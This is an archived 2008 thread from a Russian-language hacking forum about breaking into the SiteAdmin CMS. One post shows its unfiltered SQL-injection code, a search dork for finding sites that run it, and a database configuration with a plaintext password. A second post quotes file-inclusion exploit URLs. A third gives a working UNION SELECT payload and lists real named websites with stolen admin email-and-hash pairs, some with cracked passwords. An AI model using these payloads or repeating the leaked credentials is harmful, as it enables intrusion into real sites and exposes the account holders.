SiteAdmin

Discussion in 'Веб-уязвимости' started by halkfild, 3 Jul 2008.

  1. halkfild

    halkfild Members of Antichat

    Joined:
    11 Nov 2005
    Messages:
    365
    Likes Received:
    578
    Reputations:
    313
    SiteAdmin

    site: http://as-admin.com
    version: последняя с оффсайта, а если верить тому, что написано в скриптах, то v.1.4
    dork: inurl:line2.php для версии без модреврайта и нечто похожее для версии с модреврайтом


    уязвимость в файле cnews.lib.php

    PHP:
    function printInfo($tpl$index=''$other_limit=0) {
            if(!
    $this->active) return;
            
    $id=getParm('art');
            if(!
    $index$index=$this->url_self;
            if(!
    $id) return;
            
    $sql="select * from {$this->info_table} info where info.news_id=$id";
            
    $res=mysql_query($sql) or print(mysql_error());
            if (@
    mysql_num_rows($res)) {
    .................................................................
    где функция getParm в файле common.lib.php

    PHP:
    function getParm($var_name$def_val=''$type=''$max=8064)
     {  if(!isset(
    $GLOBALS['uri_set'])||!$GLOBALS['uri_set'])
        return 
    sGetParm($var_name$def_val$type$max);
         switch (
    strtoupper($type)) {
             
    //GET
             
    case 'G'$var=isset($_GET["$var_name"])?$_GET["$var_name"]:(isset($HTTP_GET_VARS["$var_name"])?$HTTP_GET_VARS["$var_name"]:$def_val); $max=min($max,255); break;
             
    //POST
             
    case 'P'$var=isset($_POST["$var_name"])?$_POST["$var_name"]:(isset($HTTP_POST_VARS["$var_name"])?$HTTP_POST_VARS["$var_name"]:$def_val); break;
             
    //COOKIE
             
    case 'C'$var=isset($_COOKIE["$var_name"])?$_COOKIE["$var_name"]:(isset($HTTP_COOKIE_VARS["$var_name"])?$HTTP_COOKIE_VARS["$var_name"]:$def_val); break;
             
    //FILES
             
    case 'F'$var=isset($_FILES["$var_name"])?$_FILES["$var_name"]:(isset($HTTP_POST_FILES["$var_name"])?$HTTP_POST_FILES["$var_name"]:$def_val); break;
             
    //SESSION
             
    case 'S'$var=isset($_SESSION["$var_name"])?$_SESSION["$var_name"]:(isset($HTTP_SESSION_VARS["$var_name"])?$HTTP_SESSION_VARS["$var_name"]:$def_val); break;
            
    //ENV
             
    case 'E'$var=isset($_ENV["$var_name"])?$_ENV["$var_name"]:(isset($HTTP_ENV_VARS["$var_name"])?$HTTP_ENV_VARS["$var_name"]:$def_val); break;
             
    //ALL (EXCEPT SESSION & ENV)
             
    default: $var=isset($_REQUEST["$var_name"])?$_REQUEST["$var_name"]:$def_val;
         }
        if(!
    is_array($var) && strlen($var)>$max) { $var=substr($var,0,$max); }
        return 
    $var;
     }
    вообщем, никакой фильтрации..

    далее

    есть файл настроек тут

    з.ы.

    по оффсайту

    tar22@mail.ru::e7cb5347305e316067fd0f23b763b409
    era@era.dp.ua::352490db5c690967a62f6c684211b1b5
    mail@zeus-it.ru::dad32a5aa256160e695870a6f58646ab
    lazarm@yandex.ru::2bb56da7e88e7597716e05168b5f53e7
    studio@as-admin.com::40f464cb41198e44392061b18977b0f4
    r31@r31.ru::260b4afd213f0f5742af6a5eb067ffe1
    c3400-club@yandex.ru::26c723d68b0d815982d39a2e76d3ab72

    конфиг

    PHP:
    /*        Configuration file for "Test"
    *        Created by STM-studio stm.dp.ua@gmail.com
    *        v.1.4
    */
    $cfg['mysql_server']    ='localhost';
    $cfg['mysql_database']    ='as-admin';
    $cfg['mysql_user']        ='tarasua';
    $cfg['mysql_spassword']    ='1508SuperKap';

    $cfg['prefix']    ='sa';       //Префікс таблиць бази даних
    $cfg['lang']    ='ru,ua,en'//Наявні мови сайту
     
    _________________________
    7 people like this.
  2. FraiDex

    FraiDex Elder - Старейшина

    Joined:
    16 Jun 2006
    Messages:
    193
    Likes Received:
    68
    Reputations:
    -11
    OpenSiteAdmin <= 0.9.1.1 Multiple File Inclusion Vulnerabilities
    Vulnerable Code:
    PHP:
    -OpenSiteAdmin/indexFooter.php
    require_once($path."footer.php");

    -
    OpenSiteAdmin/scripts/classes/DatabaseManager.php
    require_once($path."OpenSiteAdmin/include.php");
    require_once(
    $path."OpenSiteAdmin/scripts/classes/ErrorLogManager.php");

    -
    OpenSiteAdmin/scripts/classes/FieldManager.php
    require_once($path."OpenSiteAdmin/scripts/classes/Fields/Checkbox.php");
    require_once(
    $path."OpenSiteAdmin/scripts/classes/Fields/ForeignKey.php");
    .....
    ..

    -
    OpenSiteAdmin/scripts/classes/Filter.php
    require_once($path."OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php");

    -
    OpenSiteAdmin/scripts/classes/Form.php
    require_once($path."/OpenSiteAdmin/scripts/classes/Forms/Form_List.php");
    require_once(
    $path."/OpenSiteAdmin/scripts/classes/Forms/Form_Single.php");

    -
    OpenSiteAdmin/scripts/classes/FormManager.php
    require_once($path."OpenSiteAdmin/scripts/classes/Form.php");

    -
    OpenSiteAdmin/scripts/classes/LoginManager.php
    require_once($path."OpenSiteAdmin/scripts/classes/SecurityManager.php");

    -
    OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php
    require_once($path."OpenSiteAdmin/scripts/classes/RowManager.php");
    Exploit:
    Code:
    http://www.vulnerable.com/OpenSiteAdmin/indexFooter.php?path=<File Inclusion>%00
    http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/DatabaseManager.php?path=<File Inclusion>%00
    http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/FieldManager.php?path=<File Inclusion>%00
    http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/Filter.php?path=<File Inclusion>%00
    http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/Form.php?path=<File Inclusion>%00
    http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/FormManager.php?path=<File Inclusion>%00
    http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/LoginManager.php?path=<File Inclusion>%00
    http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php?path=<File Inclusion>%00
    (c)milw0rm.com
     
    #2 FraiDex, 4 Jul 2008
    Last edited: 4 Jul 2008
  3. Twiddle

    Twiddle Elder - Старейшина

    Joined:
    6 Sep 2006
    Messages:
    14
    Likes Received:
    7
    Reputations:
    0
    Седня просканил сканером и он нашел !57 инъекций.
    Юзаем:
    PHP:
    xxx.com/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,user_login,user_passw),4,5,6,7+fr

    om
    +auth_users+limit+3,10/*&cat=2
    Отчет AWVS4
    PHP:
    http://rapidshare.com/files/132908385/__1057___1080___1089___1090___1077___1084___1072____1091___1087___1088___1072___1074___1083___1077__.html
    И бонус:

    Code:
    http://www.e-light.com.ua/line2.php andrei::62a7ba583911f266cd400d8864b86999
    http://www.cifrotech.com.ua/line2.php mcm::bc37283c8e236d39f9a74881498eb1d5
    http://www.vp.com.ua/line2.php studio@as-admin.com::40f464cb41198e44392061b18977b0f4
    http://vesnasouvenir.com.ua/line2.php studio@as-admin.com 40f464cb41198e44392061b18977b0f4
    http://piton.com.ua/line2.php studio@as-admin.com::40f464cb41198e44392061b18977b0f4
    ops-print.com.ua/line2.php studio@as-admin.com::40f464cb41198e44392061b18977b0f4
    http://pigment.com.ua/line2.php tar22@mail.ru::e7cb5347305e316067fd0f23b763b409 2hgjrpfa
    http://trol.com.ua/line2.php studio@as-admin.com::40f464cb41198e44392061b18977b0f4
    http://expoland.com.ua/line2.php  studio@as-admin.com::40f464cb41198e44392061b18977b0f4
    http://www.eva.dp.ua/line2.php tar22@mail.ru::e7cb5347305e316067fd0f23b763b409 2hgjrpfa
    www.as-admin.com/ tar22@mail.ru::e7cb5347305e316067fd0f23b763b409 2hgjrpfa
     
     
    1 person likes this.